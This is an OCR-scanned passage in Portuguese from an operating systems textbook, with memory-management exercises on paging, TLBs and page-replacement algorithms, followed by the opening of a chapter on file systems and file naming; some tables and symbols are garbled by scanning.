claro que poucos projetistas de sistemas operacionais 
se preocupam mesmo com a segmentação (pois são ca- 
sados a um modelo de memória diferente). Em conse- 
quência, ela parece estar saindo rápido de moda. Hoje, 
mesmo a versão de 64 bits do x86 não dá mais suporte a 
uma segmentação de verdade. 


são sempre os mesmos? Se for apenas um acidente, por 
que eles estão no mesmo exemplo? 

3. Um sistema de troca elimina lacunas por compactação. 
Presumindo uma distribuição aleatória de muitas lacu- 
nas e muitos segmentos de dados e um tempo para ler 
ou escrever uma palavra de memória de 32 bits de 4 ns, 
aproximadamente quanto tempo leva para compactar 
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10. 


11. 


12. 


4 GB? Para simplificar, presuma que a palavra 0 faz par- 
te de uma lacuna e que a palavra mais alta na memória 
contém dados válidos. 

Considere um sistema de troca no qual a memória con- 
siste nos seguintes tamanhos de lacunas na ordem da 
memória: 10 MB, 4 MB, 20 MB, 18 MB, 7 MB, 9 MB, 
12 MB e 15 MB. Qual lacuna é pega para sucessivas 
solicitações de segmentos de 


(a) 12 MB 
(b) 10 MB 
(0) 9 MB 


para o algoritmo primeiro encaixe? Agora repita a ques- 
tão para melhor encaixe, pior encaixe e próximo encaixe. 
Qual é a diferença entre um endereço físico e um ende- 
reço virtual? 
Para cada um dos endereços virtuais decimais seguintes, 
calcule o número da página virtual e deslocamento para 
uma página de 4 KB e uma de 8 KB: 20.000, 32.768, 
60.000. 
Usando a tabela de páginas da Figura 3.9, dê o endereço 
físico correspondendo a cada um dos endereços virtuais 
a seguir: 
(a) 20 
(b) 4.100 
(c) 8.300 
O processador 8086 da Intel não tinha uma MMU ou 
suporte para memória virtual. Mesmo assim, algumas 
empresas venderam sistemas que continham uma CPU 
8086 inalterada e que realizava paginação. Dê um pal- 
pite informal sobre como eles conseguiram isso. (Dica: 
pense sobre a localização lógica da MMU.) 
Que tipo de suporte de hardware é necessário para uma 
memória virtual paginada funcionar? 
Copiar-na-escrita é uma ideia interessante usada em siste- 
mas de servidores. Faz algum sentido em um smartphone? 
Considere o programa C a seguir: 
int X[N]; 
int step = M; /* M e uma constante predefinida */ 
for (int i = 0; i < N; i += step) X[i] = X[i] + 1; 
(a) Se esse programa for executado em uma máquina 
com um tamanho de página de 4 KB e uma TLB de 
64 entradas, quais valores de M e N causarão uma 
falha de TLB para cada execução do laço interno? 
(b) Sua resposta na parte (a) seria diferente se o laço 
fosse repetido muitas vezes? 
Explique. 
O montante de espaço de disco que deve estar dis- 
ponível para armazenamento de páginas está relacio- 
nado ao número máximo de processos, n, o número 
de bytes no espaço de endereçamento virtual, v, e o 


13. 


14. 


15. 


16. 


17. 


18. 


número de bytes de RAM, r. Dê uma expressão para o 
pior caso de exigências de disco-espaço. Quão realis- 
ta é esse montante? 
Se uma instrução leva 1 ns e uma falta de página leva n ns 
adicionais, dê uma fórmula para o tempo de instrução efe- 
tivo se a falta de página ocorrer a cada k instruções. 
Uma máquina tem um espaço de endereçamento de 32 
bits e uma página de 8 KB. A tabela de páginas é in- 
teiramente em hardware, com uma palavra de 32 bits 
por entrada. Quando um processo inicializa, a tabela de 
páginas é copiada para o hardware da memória, a uma 
palavra a cada 100 ns. Se cada processo for executado 
por 100 ms (incluindo o tempo para carregar a tabela de 
páginas), qual fração do tempo da CPU será devotado ao 
carregamento das tabelas de páginas? 

Suponha que uma máquina tenha endereços virtuais de 

48 bits e endereços físicos de 32 bits. 

(a) Se as páginas têm 4 KB, quantas entradas há na ta- 
bela de páginas se ela tem apenas um único nível? 
Explique. 

(b) Suponha que esse mesmo sistema tenha uma TLB 
(Translation Lookaside Buffer) com 32 entradas. 
Além disso, suponha que um programa contenha 
instruções que se encaixam em uma página e leia 
sequencialmente elementos inteiros, longos, de um 
conjunto que compreende milhares de páginas. 
Quão efetivo será o TLB para esse caso? 

Você recebeu os seguintes dados a respeito de um siste- 

ma de memória virtual: 

(a) A TLB pode conter 1024 entradas e pode ser aces- 
sada em 1 ciclo de relógio (1 ns). 

(b) Uma entrada de tabela de página pode ser encontra- 
da em 100 ciclos de relógio ou 100 ns. 

(c) O tempo de substituição de página médio é 6 ms. 

Se as referências de página são manuseadas pela TLB 

99% das vezes e apenas 0,01% leva a uma falta de pági- 

na, qual é o tempo de tradução de endereço eficiente? 

Suponha que uma máquina tenha endereços virtuais de 

38 bits e endereços físicos de 32 bits. 

(a) Qual é a principal vantagem de uma tabela de pá- 
ginas em múltiplos níveis sobre uma página de um 
único nível? 

(b) Com uma tabela de página de dois níveis, páginas 
de 16 KB e entradas de 4 bytes, quantos bits devem 
ser alocados para o campo da tabela de páginas de 
alto nível e quantas para o campo de tabela de pági- 
nas para o nível seguinte? Explique. 

A Seção 3.3.4 declara que o Pentium Pro ampliou 

cada entrada na hierarquia da tabela de páginas a 64 

bits, mas ainda assim só conseguia endereçar 4 GB 

de memória. Explique como essa declaração pode ser 
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verdadeira quando as entradas da tabela de páginas têm 
64 bits. 
Um computador com um endereço de 32 bits usa uma 
tabela de páginas de dois níveis. Endereços virtuais são 
divididos em um campo de tabela de páginas de alto ni- 
vel de 9 bits, um campo de tabela de páginas de segundo 
nível de 11 bits e um deslocamento. Qual o tamanho das 
páginas e quantas existem no espaço de endereçamento? 
Um computador tem endereços virtuais de 32 bits e pá- 
ginas de 4 KB. O programa e os dados juntos encaixam- 
-se na página mais baixa (0-4095). A pilha encaixa-se 
na página mais alta. Quantas entradas são necessárias 
na tabela de páginas se a paginação tradicional (de um 
nível) for usada? Quantas entradas da tabela de páginas 
são necessárias para a paginação de dois níveis, com 10 
bits em cada parte? 
A seguir há um traço de execução de um fragmento de 
um programa para um computador com páginas de 512 
bytes. O programa está localizado no endereço 1020, e 
seu ponteiro de pilha está em 8192 (a pilha cresce na 
direção de 0). Dê a sequência de referências de pági- 
na geradas por esse programa. Cada instrução ocupa 4 
bytes (1 palavra) incluindo constantes imediatas. Ambas 
as referências de instrução e de dados contam na sequên- 
cia de referências. 

Carregue palavra 6144 no registrador O 

Envie registrador 0 para pilha 

Chame uma rotina em 5120, empilhando o endere- 

ço de retorno 

Subtraia a constante imediata 16 do ponteiro de pilha 

Compare o parâmetro real com a constante imediata 4 

Salte se igual a 5152 
Um computador cujos processos têm 1024 páginas em 
seus espaços de endereços mantém suas tabelas de pági- 
nas na memória. O custo extra exigido para ler uma pa- 
lavra da tabela de páginas é 5 ns. Para reduzir esse custo 
extra, o computador tem uma TLB, que contém 32 pares 
(página virtual, quadro de página física), e pode fazer 
uma pesquisa em 1 ns. Qual frequência é necessária para 
reduzir o custo extra médio para 2 ns? 
Como um dispositivo de memória associativa necessário 
para uma TLB pode ser implementado em hardware, e 
quais são as implicações de um projeto desses para sua 
capacidade de expansão? 
Uma máquina tem endereços virtuais de 48 bits e ende- 
reços físicos de 32 bits. As páginas têm 8 KB. Quantas 
entradas são necessárias para uma tabela de páginas li- 
near de um único nível? 
Um computador com uma página de 8 KB, uma memó- 
ria principal de 256 KB e um espaço de endereçamento 
virtual de 64 GB usa uma tabela de página invertida para 
implementar sua memória virtual. Qual tamanho deve 
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ter a tabela de dispersão para assegurar um comprimento 

médio da lista encadeada por entrada da tabela menor 

que 1? Presuma que o tamanho da tabela de dispersão 
seja uma potência de dois. 

Um estudante em um curso de design de compiladores 

propõe ao professor um projeto de escrever um compi- 

lador que produzirá uma lista de referências de páginas 
que podem ser usadas para implementar algoritmo óti- 
mo de substituição de página. Isso é possível? Por quê? 

Existe algo que poderia ser feito para melhorar a eficiên- 

cia da paginação no tempo de execução? 

Suponha que a série de referências de páginas virtuais 

contém repetições de longas sequências de referências 

de páginas seguidas ocasionalmente por uma referência 

de página aleatória. Por exemplo, a sequência: 0, 1,..., 

511, 431, 0, 1, ... , 511, 332, 0, 1, ...consiste em repeti- 

ções da sequência 0, 1, ... 511 seguida por uma referên- 

cia aleatória às páginas 431 e 332. 

(a) Por que os algoritmos de substituição padrão (LRU, 
FIFO, relógio) não são efetivos ao lidar com essa 
carga de trabalho para uma alocação de páginas que 
é menor do que o comprimento da sequência? 

(b) Se fossem alocados 500 quadros de páginas para 
esse programa, descreva uma abordagem de subs- 
tituição de página que teria um desempenho mui- 
to melhor do que os algoritmos LRU, FIFO ou de 
relógio. 

Se a substituição de páginas FIFO é usada com quatro 

quadros de páginas e oito páginas, quantas faltas de pá- 

ginas ocorrerão com relação à sequência 0172327103 

se quatro quadros estiverem a princípio vazios? Agora 

repita esse problema para LRU. 

Considere a sequência de páginas da Figura 3.15(b). 

Suponha que os bits R para as páginas B até 4 são 

11011011, respectivamente. Qual página a segunda 

chance removera? 

Um pequeno computador em um cartão inteligente tem 

quatro quadros de páginas. Na primeira interrupção de re- 

lógio, os bits R são 0111 (página 0 é 0, o resto é 1). Nas 

interrupções de relógio subsequentes, os valores são 1011, 

1010, 1101, 0010, 1010, 1100 e 0001. Se o algoritmo de 

envelhecimento for usado com um contador de 8 bits, dê os 

valores dos quatro contadores após a última interrupção. 

Dê um exemplo simples de uma sequência de referências 

de páginas onde a primeira página selecionada para a 

substituição será diferente para os algoritmos de substitui- 

ção de página LRU e de relógio. Presuma que 3 quadros 
sejam alocados a um processo, e a sequência de referên- 

cias contenha números de paginas do conjunto 0, 1, 2, 3. 

No algoritmo WSClock da Figura 3.20(c), o ponteiro 

aponta para uma página com R = 0. Se t = 400, a página 

será removida? E se ele for t = 1000? 
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Suponha que o algoritmo de substituição de pagina WS- 
Clock use um Tt de dois tiques, e o estado do sistema é o 
seguinte: 




















Página Marcador do tempo V R M 
0 6 1 0 1 
1 9 1 1 0 
2 9 1 1 1 
3 7 1 
4 4 0 

















onde os bits V, R e M significam Válido, Referenciado e 

Modificado, respectivamente. 

(a) Se uma interrupção de relógio ocorrer no tique 10, 
mostre o conteúdo das entradas da nova tabela. Ex- 
plique. (Você pode omitir as entradas que seguirem 
inalteradas.) 

(b) Suponha que em vez de uma interrupção de reló- 
gio, ocorra uma falta de página no tique 10 por uma 
solicitação de leitura para a página 4. Mostre o con- 
teúdo das entradas da nova tabela. Explique. (Você 
pode omitir as entradas que seguirem inalteradas.) 

Um estudante afirmou que “no abstrato, os algoritmos 

de substituição de páginas básicos (FIFO, LRU, ótimo) 

são idênticos, exceto pelo atributo usado para selecionar 

a página a ser substituída”. 

(a) Qual é o atributo para o algoritmo FIFO? Algorit- 
mo LRU? Algoritmo ótimo? 

(b) Dê o algoritmo genérico para esses algoritmos de 
substituição de páginas. 

Quanto tempo é necessário para carregar um programa de 

64 KB de um disco cujo tempo médio de procura é 5 ms, 

cujo tempo de rotação é 5 ms e cujas trilhas contêm 1 MB 

(a) para um tamanho de página de 2 KB? 

(b) para um tamanho de página de 4 KB? 

As páginas estão espalhadas aleatoriamente em tor- 

no do disco e o número de cilindros é tão grande que 

a chance de duas páginas estarem no mesmo cilindro é 

desprezível. 

Um computador tem quatro quadros de páginas. O tem- 

po de carregamento, tempo de último acesso e os bits R 

e M para cada página são como mostrados a seguir (os 

tempos estão em tiques de relógio): 

















Página | Carregado | Última referência R M 
0 126 280 1 0 
1 230 265 0 1 
2 140 270 0 0 

110 285 1 1 




















(a) Qual pagina NRU substituira? 
(b) Qual pagina FIFO substituira? 
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(c) Qual pagina LRU substituira? 

(d) Qual pagina segunda chance substituira? 

Suponha que dois processos A e B compartilhem uma 

página que não está na memória. Se o processo 4 gera 

uma falta na página compartilhada, a entrada de tabela 
de página para o processo 4 deve ser atualizada assim 
que a página for lida na memória. 

(a) Em quais condições a atualização da tabela de pá- 
ginas para o processo B deve ser atrasada, mesmo 
que o tratamento da falta da página A traga a página 
compartilhada para a memória? Explique. 

(b) Qual é o custo potencial de se atrasar a atualização 
da tabela de páginas? 

Considere o conjunto bidimensional a seguir: 


int X[64][64]; 


Suponha que um sistema tenha quatro quadros de pági- 
nas e cada quadro tenha 128 palavras (um inteiro ocupa 
uma palavra). Programas que manipulam o conjunto X 
encaixam-se exatamente em uma página e sempre ocu- 
pam a página 0. Os dados são trocados nos outros três 
quadros. O conjunto X é armazenado em uma ordem de 
fila crescente (isto é, X[0][1] segue X70][0] na memória). 
Qual dos dois fragmentos de códigos mostrados a seguir 
geram o número mais baixo de faltas de páginas? Expli- 
que e calcule o número total de faltas de páginas. 


Fragmento A 
for (int j = 0; j < 64; j++) 
for (int i = 0; i < 64; i++) X[i][j] = 0; 
Fragmento B 
for (int i = 0; i < 64; i++) 
for (int j = 0; j < 64; j++) X[iJ[j] = 0; 


Você foi contratado por uma companhia de computação 
na nuvem que emprega milhares de servidores em cada 
um dos seus centros de dados. Eles ouviram falar re- 
centemente que valeria a pena lidar com uma falta de 
página no servidor A lendo a página da memória RAM 
de algum outro servidor em vez do seu drive de disco 
local. 
(a) Como isso poderia ser feito? 
(b) Em quais condições a abordagem valeria a pena? 
Seria factível? 
Uma das primeiras máquinas de compartilhamento de 
tempo, o DEC PDP-1, tinha uma memória (núcleo) de 
palavras de 18 bits e 4K. Ele executava um processo de 
cada vez em sua memória. Quando o escalonador deci- 
dia executar outro processo, o processo na memória era 
escrito para um tambor de paginação, com palavras de 
18 bits e 4K em torno da circunferência do tambor. O 
tambor podia começar a escrever (ou ler) em qualquer 
palavra, em vez de somente na palavra 0. Por que você 
acha que esse tambor foi escolhido? 
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Um computador fornece a cada processo 65.536 bytes 
de espaço de endereçamento divididos em páginas de 
4096 bytes cada. Um programa em particular tem um 
tamanho de texto de 32.768 bytes, um tamanho de da- 
dos de 16.386 bytes e um tamanho de pilha de 15.870 
bytes. Esse programa caberá no espaço de endereçamen- 
to da máquina? Suponha que em vez de 4096 bytes, o 
tamanho da página fosse 512 bytes eles caberiam então? 
Cada página deve conter texto, dados, ou pilha, não uma 
mistura de dois ou três deles. 

Observou-se que o número de instruções executadas en- 
tre faltas de páginas é diretamente proporcional ao nú- 
mero de quadros de páginas alocadas para um programa. 
Se a memória disponível for dobrada, o intervalo médio 
entre as faltas de páginas também será dobrado. Supo- 
nha que uma instrução normal leva 1 ms, mas se uma 
falta de página ocorrer, ela leva 2001 us (isto é, 2 ms) 
para lidar com a falta. Se um programa leva 60 s para 
ser executado, tempo em que ocorrem 15.000 faltas de 
páginas, quanto tempo ele levaria para ser executado se 
duas vezes mais memória estivesse disponível? 

Um grupo de projetistas de sistemas operacionais para 
a Frugal Computer Company está pensando sobre ma- 
neiras para reduzir o montante de armazenamento de 
apoio necessário em seu novo sistema operacional. O 
chefe deles sugeriu há pouco não se incomodarem em 
salvar o código do programa na área de troca, mas ape- 
nas paginá-lo diretamente do arquivo binário onde quer 
que ele seja necessário. Em quais condições, se hou- 
ver, essa ideia funciona para o código do programa? 
Em quais condições, se houver, isso funciona para os 
dados? 

Uma instrução em linguagem de máquina para carre- 
gar uma palavra de 32 bits em um registrador contém o 
endereço de 32 bits da palavra a ser carregada. Qual o 
número máximo de faltas de páginas que essa instrução 
pode causar? 

Explique a diferença entre fragmentação interna e frag- 
mentação externa. Qual delas ocorre nos sistemas de 
paginação? Qual delas ocorre em sistemas usando seg- 
mentação pura? 

Quando tanto segmentação quanto paginação estão sen- 
do usadas, como em MULTICS, primeiro o descritor do 
sistema precisa ser examinado, então o descritor de pá- 
ginas. A TLB também funciona dessa maneira, com dois 
níveis de verificação? 

Consideramos um programa que tem os dois segmen- 
tos mostrados a seguir consistindo em instruções no 
segmento 0, e dados leitura/escrita no segmento 1. O 
segmento 0 tem proteção contra leitura/execução, e o 
segmento | tem proteção apenas contra leitura/escri- 
ta. O sistema de memória é um sistema de memória 
virtual paginado por demanda com endereços virtuais 
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que tem números de páginas de 4 bits e um desloca- 
mento de 10 bits. 
































Segmento 0 Segmento 1 

Leitura/Execução Leitura/Escrita 
Página Quadro de Página Quadro de 
Virtual# Pagina # Virtual# Pagina # 

0 2 0 No Disco 

1 No Disco 1 14 

2 11 2 9 

3 5 3 6 

4 No Disco 4 No Disco 

5 No Disco 5 13 

6 4 6 8 

7 3 7 12 
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Para cada um dos casos a seguir, dé o endereço de real 
memória real (efetivo) que resulta da tradução dinâmica 
de endereço, ou identifique o tipo de falta que ocorre 
(falta de página ou proteção). 

(a) Busque do segmento 1, página 1, deslocamento 3. 
(b) Armazene no segmento 0, página 0, deslocamento 
16. 

(c) Busque do segmento 1, página 4, deslocamento 28. 
(d) Salte para localização no segmento 1, página 3, 
deslocamento 32. 

Você consegue pensar em alguma situação onde dar su- 
porte à memória virtual seria uma má ideia, e o que seria 
ganho ao não dar suporte à memória virtual? Explique. 
A memória virtual fornece um mecanismo para isolar 
um processo do outro. Quais dificuldades de gerencia- 
mento de memória estariam envolvidas ao permitir que 
dois sistemas operacionais fossem executados ao mesmo 
tempo? Como poderíamos lidar com essas dificuldades? 
Trace um histograma e calcule a média e a mediana 
dos tamanhos de arquivos binários executáveis em um 
computador a que você tem acesso. Em um sistema 
Windows, examine todos os arquivos .exe e .dll; em um 
UNIX examine todos os arquivos executáveis em /bin, 
/usr/bin e /local/bin que não sejam roteiros (scripts) — 
ou use o comando file para encontrar todos os executá- 
veis. Determine o tamanho de página ótimo para esse 
computador considerando somente o código (não da- 
dos). Considere a fragmentação interna e o tamanho 
da tabela de páginas, fazendo uma suposição razoável 
sobre o tamanho de uma entrada de tabela de páginas. 
Presuma que todos os programas têm a mesma proba- 
bilidade de serem executados e desse modo devem ser 
ponderados igualmente. 

Escreva um programa que simule um sistema de pagina- 
ção usando o algoritmo do envelhecimento. O número 
de quadros de páginas é um parâmetro. A sequência de 
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referências de páginas deve ser lida a partir de um arqui- 

vo. Para um dado arquivo de entrada, calcule o número 

de faltas de páginas por 1000 referências de memória 
como uma função do número de quadros de páginas 
disponíveis. 

Escreva um programa que simule um sistema de pagina- 

ção como brincadeira que use um algoritmo WSClock. 

O sistema é uma brincadeira porque presumiremos que 

não há referências de escrita (não muito realista), e o tér- 

mino e criação do processo são ignorados (vida eterna). 

Os dados de entrada serão: 

e O limiar de idade para a recuperação do quadro. 

e O intervalo da interrupção do relógio expresso 
como número de referências à memória. 

e | Umarquivo contendo a sequência de referências de 
páginas. 

(a) Descreva as estruturas de dados básicas e algorit- 

mos em sua implementação. 

(b) Mostre que a sua simulação comporta-se como o 

esperado para um exemplo de entrada simples (mas 

não trivial). 

(c) Calcule o número de faltas de páginas e tamanho 
do conjunto de trabalho por 1000 referências de 
memória. 

(d) Explique o que é necessário para ampliar o progra- 

ma para lidar com uma sequência de referências de 

páginas que também incluam escritas. 

Escreva um programa que demonstre o efeito de falhas 

de TLB sobre o tempo de acesso à memória efetivo men- 

surando o tempo por acesso que ele leva através de um 
longo conjunto. 

(a) Explique os principais conceitos por trás do progra- 
ma e descreva o que você espera que a saída mostre 
para uma arquitetura de memória virtual prática. 

(b) Execute o programa em algum outro computador 

e explique como os dados se encaixaram em suas 

expectativas. 

(c) Repita a parte (b), mas para um computador mais 
velho com uma arquitetura diferente e explique 
quaisquer diferenças importantes na saída. 

Escreva um programa que demonstrará a diferença en- 

tre usar uma política de substituição de página local e 

uma global para o caso simples de dois processos. Você 

precisará de uma rotina que possa gerar uma sequência 
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de referéncias de paginas baseadas em um modelo esta- 
tistico. Esse modelo tem N estados enumerados de 0 a 
N — 1 representando cada uma das possíveis referências 
de páginas e a probabilidade p, associada com cada es- 
tado i representando a chance de que a próxima referên- 
cia esteja na mesma página. De outra forma, a próxima 
referência de página será uma das outras páginas com 
igual probabilidade. 

(a) Demonstre que a rotina de geração de sequências 
de referências de páginas comporta-se adequada- 
mente para algum N pequeno. 

(b) Calcule a frequência de faltas de páginas para um 

pequeno exemplo no qual há um processo e um nú- 

mero fixo de quadros de páginas. Explique por que 

o comportamento é correto. 

(c) Repita a parte (b) com dois processos com sequên- 
cias de referências de páginas independentes e duas 
vezes o número de quadros de páginas da parte (b). 

(d) Repita a parte (c), mas usando uma política global 

em vez de uma local. Também compare a frequên- 

cia de faltas de páginas por processo com aquela da 
abordagem de política local. 

Escreva um programa que possa ser usado para com- 

parar a efetividade de adicionar-se um campo marcador 

às entradas TLB quando o controle for alternado entre 
dois programas. O campo marcador é usado para efe- 
tivamente rotular cada entrada com a identificação do 
processo. Observe que uma TLB sem esse campo pode 
ser simulada exigindo que todas as entradas da TLB te- 
nham o mesmo valor no marcador a qualquer momento. 

Os dados de entrada serão: 

e | O número de entradas TLB disponíveis. 

e O intervalo de interrupção do relógio expresso 
como número de referências de memória. 

e Um arquivo contendo uma sequência de entradas 
(processo, referências de páginas). 

e O custo para se atualizar uma entrada TLB. 

(a) Descreva a estrutura de dados e algoritmos básicos 

em sua implementação. 

(b) Demonstre que a sua simulação comporta-se como 

esperado para um exemplo de entrada simples (mas 

não trivial). 

(c) Calcule o número de atualizações de TLB para 
1000 referências. 





odas as aplicações de computadores precisam ar- 

mazenar e recuperar informações. Enquanto um 

processo está sendo executado, ele pode armazenar 

uma quantidade limitada de informações dentro do 

seu próprio espaço de endereçamento. No entanto, 
a capacidade de armazenamento está restrita ao tama- 
nho do espaço do endereçamento virtual. Para algumas 
aplicações esse tamanho é adequado, mas, para outras, 
como reservas de passagens aéreas, bancos ou sistemas 
corporativos, ele é pequeno demais. 

Um segundo problema em manter informações 
dentro do espaço de endereçamento de um processo 
é que, quando o processo é concluído, as informações 
são perdidas. Para muitas aplicações (por exemplo, 
bancos de dados), as informações precisam ser retidas 
por semanas, meses, ou mesmo para sempre. Perdê- 
-las quando o processo que as está utilizando é con- 
cluído é algo inaceitável. Além disso, elas não devem 
desaparecer quando uma falha no computador mata 
um processo. 

Um terceiro problema é que frequentemente é neces- 
sário que múltiplos processos acessem (partes de) uma 
informação ao mesmo tempo. Se temos um diretório 
telefônico on-line armazenado dentro do espaço de um 
único processo, apenas aquele processo pode acessá-lo. 
A maneira para solucionar esse problema é tornar a in- 
formação em si independente de qualquer processo. 

Assim, temos três requisitos essenciais para o arma- 
zenamento de informações por um longo prazo: 


1. Deve ser possível armazenar uma quantidade 
muito grande de informações. 


2. As informações devem sobreviver ao término do 
processo que as está utilizando. 

3. Múltiplos processos têm de ser capazes de aces- 
sá-las ao mesmo tempo. 


Discos magnéticos foram usados por anos para esse 
armazenamento de longo prazo. Em anos recentes, 
unidades de estado sólido tornaram-se cada vez mais 
populares, à medida que elas não têm partes móveis 
que possam quebrar. Elas também oferecem um rápi- 
do acesso aleatório. Fitas e discos óticos também fo- 
ram amplamente usados, mas são dispositivos com um 
desempenho muito pior e costumam ser usados como 
backups. Estudaremos mais sobre discos no Capítulo 
5, mas por ora, basta pensar em um disco como uma 
sequência linear de blocos de tamanho fixo e que dão 
suporte a duas operações: 


1. Leia o bloco k. 
2. Escreva no bloco k. 


Na realidade, existem mais operações, mas com es- 
sas duas, em princípio, você pode solucionar o proble- 
ma do armazenamento de longo prazo. 

No entanto, essas são operações muito inconvenien- 
tes, mais ainda em sistemas grandes usados por mui- 
tas aplicações e possivelmente múltiplos usuários (por 
exemplo, em um servidor). Apenas algumas das ques- 
tões que rapidamente surgem são: 


1. Como você encontra informações? 

2. Como impedir que um usuário leia os dados de 
outro? 

3. Como saber quais blocos estão livres? 


e há muitas mais. 
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Da mesma maneira que vimos como o sistema ope- 
racional abstraia o conceito do processador para criar a 
abstração de um processo e como ele abstraia o conceito 
da memória física para oferecer aos processos espaços 
de endereçamento (virtuais), podemos solucionar esse 
problema com uma nova abstração: o arquivo. Juntas, 
as abstrações de processos (e threads), espaços de ende- 
reçamento e arquivos são os conceitos mais importantes 
relacionados com os sistemas operacionais. Se você re- 
almente compreender esses três conceitos do início ao 
fim, estará bem encaminhado para se tornar um especia- 
lista em sistemas operacionais. 

Arquivos são unidades lógicas de informação cria- 
das por processos. Um disco normalmente conterá mi- 
lhares ou mesmo milhões deles, cada um independente 
dos outros. Na realidade, se pensar em cada arquivo 
como uma espécie de espaço de endereçamento, você 
não estará muito longe da verdade, exceto que eles são 
usados para modelar o disco em vez de modelar a RAM. 

Processos podem ler arquivos existentes e criar no- 
vos se necessário. Informações armazenadas em ar- 
quivos devem ser persistentes, isto é, não devem ser 
afetadas pela criação e término de um processo. Um 
arquivo deve desaparecer apenas quando o seu pro- 
prietário o remove explicitamente. Embora as opera- 
ções para leitura e escrita de arquivos sejam as mais 
comuns, existem muitas outras, algumas das quais 
examinaremos a seguir. 

Arquivos são gerenciados pelo sistema operacional. 
Como são estruturados, nomeados, acessados, usados, 
protegidos, implementados e gerenciados são tópicos 
importantes no projeto de um sistema operacional. 
Como um todo, aquela parte do sistema operacional li- 
dando com arquivos é conhecida como sistema de ar- 
quivos e é o assunto deste capítulo. 

Do ponto de vista do usuário, o aspecto mais impor- 
tante de um sistema de arquivos é como ele aparece, 
em outras palavras, o que constitui um arquivo, como 
os arquivos são nomeados e protegidos, quais operações 
são permitidas e assim por diante. Os detalhes sobre se 
listas encadeadas ou mapas de bits são usados para o ar- 
mazenamento disponível e quantos setores existem em 
um bloco de disco lógico não lhes interessam, embora 
sejam de grande importância para os projetistas do siste- 
ma de arquivos. Por essa razão, estruturamos o capítulo 
como várias seções. As duas primeiras dizem respeito à 
interface do usuário para os arquivos e para os diretórios, 
respectivamente. Então segue uma discussão detalhada 
de como o sistema de arquivos é implementado e geren- 
ciado. Por fim, damos alguns exemplos de sistemas de 
arquivos reais. 


4.1 Arquivos 


Nas páginas a seguir examinaremos os arquivos do 
ponto de vista do usuário, isto é, como eles são usados e 
quais propriedades têm. 


4.1.1 Nomeação de arquivos 


Um arquivo é um mecanismo de abstração. Ele for- 
nece uma maneira para armazenar informações sobre 
o disco e lê-las depois. Isso deve ser feito de tal modo 
que isole o usuário dos detalhes de como e onde as in- 
formações estão armazenadas, e como os discos real- 
mente funcionam. 

É provável que a característica mais importante de 
qualquer mecanismo de abstração seja a maneira como 
os objetos que estão sendo gerenciados são nomeados; 
portanto, começaremos nosso exame dos sistemas de ar- 
quivos com o assunto da nomeação de arquivos. Quan- 
do um processo cria um arquivo, ele lhe dá um nome. 
Quando o processo é concluído, o arquivo continua a 
existir e pode ser acessado por outros processos usando 
o seu nome. 

As regras exatas para a nomeação de arquivos variam 
de certa maneira de sistema para sistema, mas todos os 
sistemas operacionais atuais permitem cadeias de uma a 
oito letras como nomes de arquivos legais. Desse modo, 
andrea, bruce e cathy são nomes de arquivos possíveis. 
Não raro, dígitos e caracteres especiais também são per- 
mitidos, assim nomes como 2, urgente! e Fig.2-14 são 
muitas vezes válidos também. Muitos sistemas de ar- 
quivos aceitam nomes com até 255 caracteres. 

Alguns sistemas de arquivos distinguem entre letras 
maiúsculas e minúsculas, enquanto outros, não. O UNIX 
pertence à primeira categoria; o velho MS-DOS cai na 
segunda. (Como nota, embora antigo, o MS-DOS ainda 
é amplamente usado em sistemas embarcados, portanto 
ele não é obsoleto de maneira alguma.) Assim, um sis- 
tema UNIX pode ter todos os arquivos a seguir como 
três arquivos distintos: maria, Maria e MARIA. No MS- 
-DOS, todos esses nomes referem-se ao mesmo arquivo. 

Talvez seja um bom momento para fazer um comen- 
tário aqui sobre os sistemas operacionais. O Windows 
95 e o Windows 98 usavam o mesmo sistema de arqui- 
vos do MS-DOS, chamado FAT-16, e portanto herda- 
ram muitas de suas propriedades, como a maneira de se 
formarem os nomes dos arquivos. O Windows 98 intro- 
duziu algumas extensões ao FAT-16, levando ao FAT- 
32, mas esses dois são bastante parecidos. Além disso, o 
Windows NT, Windows 2000, Windows XP, Windows 


Vista, Windows 7 e Windows 8 ainda dão suporte a am- 
bos os sistemas de arquivos FAT, que estão realmente 
obsoletos agora. No entanto, esses sistemas operacio- 
nais novos também têm um sistema de arquivos nativo 
muito mais avançado (NTFS — native file system) que 
tem propriedades diferentes (como nomes de arquivos 
em Unicode). Na realidade, há um segundo sistema de 
arquivos para o Windows 8, conhecido como ReFS (ou 
Resilient File System — sistema de arquivos resi- 
liente), mas ele é voltado para a versão de servidor do 
Windows 8. Neste capítulo, quando nos referimos ao 
MS-DOS ou sistemas de arquivos FAT, estaremos fa- 
lando do FAT-16 e FAT-32 como usados no Windows, a 
não ser que especificado de outra forma. Discutiremos 
o sistema de arquivos FAT mais tarde neste capítulo e 
NTFS no Capítulo 12, onde examinaremos o Windo- 
ws 8 com detalhes. Incidentalmente, existe também um 
novo sistema de arquivos semelhante ao FAT, conhe- 
cido como sistema de arquivos exFAT, uma extensão 
da Microsoft para o FAT-32 que é otimizado para flash 
drives e sistemas de arquivos grandes. ExFAT é o único 
sistema de arquivos moderno da Microsoft que o OS X 
pode ler e escrever. 

Muitos sistemas operacionais aceitam nomes de 
arquivos de duas partes, com as partes separadas por 
um ponto, como em prog.c. A parte que vem em se- 
guida ao ponto é chamada de extensão do arquivo 
e costuma indicar algo seu a respeito. No MS-DOS, 


[FIGURA 4.1 | Algumas extensões comuns de arquivos. 
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por exemplo, nomes de arquivos têm de 1 a 8 caracte- 
res, mais uma extensão opcional de 1 a 3 caracteres. 
No UNIX, o tamanho da extensão, se houver, cabe 
ao usuário decidir, e um arquivo pode ter até duas ou 
mais extensões, como em homepage.html.zip, onde 
“html indica uma página da web em HTML e .zip in- 
dica que o arquivo (homepage.html) foi compactado 
usando o programa zip. Algumas das extensões de ar- 
quivos mais comuns e seus significados são mostra- 
das na Figura 4.1. 

Em alguns sistemas (por exemplo, todas as variações 
do UNIX), as extensões de arquivos são apenas con- 
venções e não são impostas pelo sistema operacional. 
Um arquivo chamado file.txt pode ser algum tipo de 
arquivo de texto, mas aquele nome tem a função mais 
de lembrar o proprietário do que transmitir qualquer in- 
formação real para o computador. Por outro lado, um 
compilador C pode realmente insistir em que os arqui- 
vos que ele tem de compilar terminem em .c, e se isso 
não acontecer, pode recusar-se a compilá-los. O sistema 
operacional, no entanto, não se importa. 

Convenções como essa são especialmente úteis 
quando o mesmo programa pode lidar com vários ti- 
pos diferentes de arquivos. O compilador C, por exem- 
plo, pode receber uma lista de vários arquivos a serem 
compilados e ligados, alguns deles arquivos C e outros 
